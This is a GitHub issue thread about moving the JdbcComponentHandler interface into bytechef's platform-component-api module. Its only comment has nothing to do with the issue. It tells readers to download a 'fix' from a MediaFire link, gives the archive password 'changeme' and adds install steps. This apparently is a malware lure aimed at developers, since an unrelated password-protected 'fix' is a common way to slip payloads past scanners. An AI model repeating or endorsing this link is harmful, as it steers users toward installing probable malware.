### ISSUE TITLE
[task] Move JdbcComponentHandler interface to platform-component-api

### ISSUE THREAD

**Issue by ivicac** [bytechefhq/bytechef#1386]
- All JDBC-related connectors will be available out of the box as part of the platform, and if someone wants to implement a custom one, he can use the provided ComponentHandler interface.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
